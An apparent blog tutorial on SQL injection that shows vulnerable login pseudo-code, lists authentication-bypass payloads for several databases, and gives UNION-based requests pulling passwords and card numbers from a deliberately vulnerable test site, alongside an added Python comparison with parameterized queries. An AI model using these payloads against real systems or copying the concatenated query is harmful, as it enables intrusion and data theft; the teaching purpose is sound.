
How to Protect website from SQL Injection Attack

Written by Mubassir patel

SQL Injection (SQLi) is an injection attack in which an attacker can execute malicious SQL statements (also commonly referred to as a malicious payload) that control a web application's database server (also commonly referred to as a Relational Database Management System, or RDBMS). Since an SQL Injection vulnerability can affect any website or web application that uses an SQL-based database, it is one of the oldest, most prevalent and most dangerous web application vulnerabilities.

By leveraging an SQL Injection vulnerability, given the right circumstances, an attacker can use it to bypass a web application’s authentication and authorization mechanisms and retrieve the contents of an entire database.

How SQL Injection works

To inject SQL, an attacker first needs to find an input location that reaches the database. For an SQL Injection attack to take place, the vulnerable website needs to include user input directly within an SQL statement.

The following server-side pseudo-code is used to authenticate users to the web application.

# Define POST variables
uname = request.POST['username']
passwd = request.POST['password']

# SQL query vulnerable to SQLi: the user input is concatenated straight into the statement
sql = "SELECT id FROM users WHERE username='" + uname + "' AND password='" + passwd + "'"

# Execute the SQL statement exactly as built above
database.execute(sql)

A simple example of an SQL Injection payload could be something as simple as setting the password field to password' OR 1=1

This would result in the following SQL query being run against the database server.

SELECT id FROM users WHERE username='username' AND password='password' OR 1=1'

An attacker can also comment out the rest of the SQL statement to control the execution of the SQL query further.

-- MySQL, MSSQL, Oracle, PostgreSQL, SQLite
' OR '1'='1' --
' OR '1'='1' /*
-- MySQL
' OR '1'='1' #
-- Access (using null characters)
' OR '1'='1' %00
' OR '1'='1' %16
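As an added example (not code from the original post), the login pseudo-code above is rebuilt as runnable Python against a constructed in-memory SQLite table, beside a parameterized version that is the protection this article's title refers to. The table contents, usernames and passwords are constructed; the payloads are the ones shown above.

```python
import sqlite3


def make_db():
    """Constructed sample users table (not from the original page)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users (username, password) VALUES ('alice', 'correct horse')")
    conn.commit()
    return conn


def login_vulnerable(conn, uname, passwd):
    """Builds the query by string concatenation, exactly like the page's pseudo-code."""
    sql = ("SELECT id FROM users WHERE username='" + uname +
           "' AND password='" + passwd + "'")
    try:
        return conn.execute(sql).fetchone() is not None
    except sqlite3.Error:
        # An unbalanced quote is a syntax error; this is what the trailing -- comment hides.
        return False


def login_parameterized(conn, uname, passwd):
    """Binds user input as parameters; the database never parses it as SQL."""
    sql = "SELECT id FROM users WHERE username=? AND password=?"
    return conn.execute(sql, (uname, passwd)).fetchone() is not None


def demo():
    """Runs the same inputs through both versions and returns the login outcomes."""
    conn = make_db()
    bare = "password' OR 1=1"          # the page's first payload, no comment suffix
    commented = "password' OR 1=1 --"  # the same payload with the rest commented out
    return {
        "vulnerable_legit": login_vulnerable(conn, "alice", "correct horse"),
        "vulnerable_bare_payload": login_vulnerable(conn, "alice", bare),
        "vulnerable_commented_payload": login_vulnerable(conn, "alice", commented),
        "vulnerable_unknown_user": login_vulnerable(conn, "nobody", commented),
        "parameterized_legit": login_parameterized(conn, "alice", "correct horse"),
        "parameterized_payload": login_parameterized(conn, "alice", commented),
    }


if __name__ == "__main__":
    for name, ok in demo().items():
        print(f"{name}: {'logged in' if ok else 'rejected'}")
```

The bare payload fails on the dangling quote, the commented one logs in even for a username that does not exist, and the parameterized query treats the whole payload as a literal password and rejects it.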

What’s the worst an attacker can do with SQL?

Some of the things an attacker can do with an SQL Injection vulnerability:

  • An attacker can use SQL Injection to bypass authentication or even impersonate specific users.
  • One of SQL's primary functions is to select data based on a query and output the result of that query. An SQL Injection vulnerability could allow the complete disclosure of data residing on a database server.
  • An attacker could use an SQL Injection vulnerability to delete data from a database.

The anatomy of an SQL Injection attack

An SQL Injection needs just two conditions to exist:

1) a relational database that uses SQL;
2) a user-controllable input which is directly used in an SQL query.

The following example shows an injection that uses the UNION operator to append the result of a second query to the application's own query.

The following HTTP request is a normal request that a legitimate user would send.

GET http://testphp.vulnweb.com/artists.php?artist=1 HTTP/1.1
Host: testphp.vulnweb.com


Although the above request looks normal, the artist parameter in the GET request’s query string is vulnerable to SQL Injection.

GET http://testphp.vulnweb.com/artists.php?artist=-1 UNION SELECT 1, 2, 3 HTTP/1.1
Host: testphp.vulnweb.com

SQL injection using the UNION operator

GET http://testphp.vulnweb.com/artists.php?artist=-1 UNION SELECT 1,pass,cc FROM users WHERE uname='test' HTTP/1.1
Host: testphp.vulnweb.com

SQL injection using the UNION operator with a FROM clause

About the author

Mubassir patel

Mubassir is the founder and developer of this site. He is a computer science engineer. He has a very deep interest in ethical hacking, penetration testing, website development and all technology topics.
